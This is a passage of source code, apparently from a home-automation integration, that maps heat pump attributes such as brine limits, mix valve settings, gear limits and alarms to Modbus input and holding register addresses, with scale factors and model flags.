{ KEY_ADDRESS: 148, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_3:
{ KEY_ADDRESS: 149, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_4:
{ KEY_ADDRESS: 150, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_5:
{ KEY_ADDRESS: 151, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DISCONNECT_HOT_GAS_END_TANK:
{ KEY_ADDRESS: 152, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_LEGACY_HEAT_PUMP_COMPRESSOR_RUNNING:
{ KEY_ADDRESS: 153, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_LEGACY_HEAT_PUMP_REPORTING_ALARM:
{ KEY_ADDRESS: 154, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_LEGACY_HEAT_PUMP_START_SIGNAL:
{ KEY_ADDRESS: 155, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_LEGACY_HEAT_PUMP_TAP_WATER_SIGNAL:
{ KEY_ADDRESS: 156, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_COMBINED_OUTPUT_OF_ALL_CLASS_D_ALARMS:
{ KEY_ADDRESS: 160, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_PRIMARY_UNIT_HAS_LOST_COMMUNICATION:
{ KEY_ADDRESS: 161, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_CLASS_A_ALARM_DETECTED_ON_THE_GENESIS_SECONDARY:
{ KEY_ADDRESS: 162, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_CLASS_B_ALARM_DETECTED_ON_THE_GENESIS_SECONDARY:
{ KEY_ADDRESS: 163, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_COMBINED_OUTPUT_OF_ALL_CLASS_E_ALARMS:
{ KEY_ADDRESS: 170, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_GENERAL_LEGACY_HEAT_PUMP_ALARM:
{ KEY_ADDRESS: 171, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_PRIMARY_UNIT_CAN_NOT_COMMUNICATE_WITH_EXPANSION:
{ KEY_ADDRESS: 173, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_OPERATIONAL_MODE:
{ KEY_ADDRESS: 0, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION:
{ KEY_ADDRESS: 3, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION:
{ KEY_ADDRESS: 4, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_COMFORT_WHEEL_SETTING:
{ KEY_ADDRESS: 5, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_1:
{ KEY_ADDRESS: 6, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_2:
{ KEY_ADDRESS: 7, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_3:
{ KEY_ADDRESS: 8, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_4:
{ KEY_ADDRESS: 9, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_5:
{ KEY_ADDRESS: 10, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_6:
{ KEY_ADDRESS: 11, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_HEAT_CURVE_Y_7:
{ KEY_ADDRESS: 12, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_HEATING_SEASON_STOP_TEMPERATURE:
{ KEY_ADDRESS: 16, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_START_TEMPERATURE_TAP_WATER:
{ KEY_ADDRESS: 22, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_STOP_TEMPERATURE_TAP_WATER:
{ KEY_ADDRESS: 23, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_HEATING:
{ KEY_ADDRESS: 26, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_HEATING:
{ KEY_ADDRESS: 27, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_TAP_WATER:
{ KEY_ADDRESS: 28, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_TAP_WATER:
{ KEY_ADDRESS: 29, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_COOLING_MIX_VALVE_SET_POINT:
{ KEY_ADDRESS: 30, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_TWC_MIX_VALVE_SET_POINT:
{ KEY_ADDRESS: 31, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_WCS_RETURN_LINE_SET_POINT:
{ KEY_ADDRESS: 32, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_TWC_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 33, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_TWC_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 34, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_TWC_START_TEMPERATURE_IMMERSION_HEATER:
{ KEY_ADDRESS: 35, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_TWC_START_DELAY_IMMERSION_HEATER:
{ KEY_ADDRESS: 36, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_TWC_STOP_TEMPERATURE_IMMERSION_HEATER:
{ KEY_ADDRESS: 37, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_WCS_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 38, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_WCS_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 39, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_MIX_VALVE_2_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 40, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_2_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 41, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_3_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 42, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_3_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 43, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_4_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 44, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_4_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 45, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_5_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 46, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIX_VALVE_5_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 47, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SURPLUS_HEAT_CHILLER_SET_POINT:
{ KEY_ADDRESS: 48, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_COOLING_SUPPLY_LINE_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 49, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_COOLING_SUPPLY_LINE_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 50, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STARTING_FAN_1:
{ KEY_ADDRESS: 51, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STARTING_FAN_2:
{ KEY_ADDRESS: 52, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STOPPING_FAN_1:
{ KEY_ADDRESS: 53, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STOPPING_FAN_2:
{ KEY_ADDRESS: 54, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 55, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SURPLUS_HEAT_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 56, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_POOL_CHARGE_SET_POINT:
{ KEY_ADDRESS: 58, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_POOL_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 59, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_POOL_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE:
{ KEY_ADDRESS: 60, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_GEAR_SHIFT_DELAY_HEATING:
{ KEY_ADDRESS: 61, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_GEAR_SHIFT_DELAY_POOL:
{ KEY_ADDRESS: 62, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_GEAR_SHIFT_DELAY_COOLING:
{ KEY_ADDRESS: 63, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_IN_HIGH_ALARM_LIMIT:
{ KEY_ADDRESS: 67, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_IN_LOW_ALARM_LIMIT:
{ KEY_ADDRESS: 68, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_OUT_LOW_ALARM_LIMIT:
{ KEY_ADDRESS: 69, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_MAX_DELTA_LIMIT:
{ KEY_ADDRESS: 70, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_HOT_GAS_PUMP_START_TEMPERATURE_DISCHARGE_PIPE:
{ KEY_ADDRESS: 71, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_HOT_GAS_PUMP_LOWER_STOP_LIMIT_TEMPERATURE_DISCHARGE_PIPE:
{ KEY_ADDRESS: 72, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_HOT_GAS_PUMP_UPPER_STOP_LIMIT_TEMPERATURE_DISCHARGE_PIPE:
{ KEY_ADDRESS: 73, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_EXTERNAL_ADDITIONAL_HEATER_START:
{ KEY_ADDRESS: 75, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_CONDENSER_PUMP_LOWEST_ALLOWED_SPEED:
{ KEY_ADDRESS: 76, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_PUMP_LOWEST_ALLOWED_SPEED:
{ KEY_ADDRESS: 77, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_EXTERNAL_ADDITIONAL_HEATER_STOP:
{ KEY_ADDRESS: 78, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_CONDENSER_PUMP_HIGHEST_ALLOWED_SPEED:
{ KEY_ADDRESS: 79, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_PUMP_HIGHEST_ALLOWED_SPEED:
{ KEY_ADDRESS: 80, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_CONDENSER_PUMP_STANDBY_SPEED:
{ KEY_ADDRESS: 81, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_BRINE_PUMP_STANDBY_SPEED:
{ KEY_ADDRESS: 82, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_POOL:
{ KEY_ADDRESS: 85, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_POOL:
{ KEY_ADDRESS: 86, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_COOLING:
{ KEY_ADDRESS: 87, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_COOLING:
{ KEY_ADDRESS: 88, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_START_TEMP_FOR_COOLING:
{ KEY_ADDRESS: 105, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_STOP_TEMP_FOR_COOLING:
{ KEY_ADDRESS: 106, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_1:
{ KEY_ADDRESS: 107, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_1:
{ KEY_ADDRESS: 108, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_1:
{ KEY_ADDRESS: 109, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_1:
{ KEY_ADDRESS: 110, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_1:
{ KEY_ADDRESS: 111, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_1:
{ KEY_ADDRESS: 112, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_1:
{ KEY_ADDRESS: 113, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_1:
{ KEY_ADDRESS: 114, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_1:
{ KEY_ADDRESS: 115, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_FIXED_SYSTEM_SUPPLY_SET_POINT:
{ KEY_ADDRESS: 116, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_2:
{ KEY_ADDRESS: 199, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_2:
{ KEY_ADDRESS: 200, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_2:
{ KEY_ADDRESS: 201, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_2:
{ KEY_ADDRESS: 202, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_2:
{ KEY_ADDRESS: 203, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_2:
{ KEY_ADDRESS: 204, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_2:
{ KEY_ADDRESS: 205, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_2:
{ KEY_ADDRESS: 206, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_2:
{ KEY_ADDRESS: 207, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_3:
{ KEY_ADDRESS: 208, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_3:
{ KEY_ADDRESS: 209, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_3:
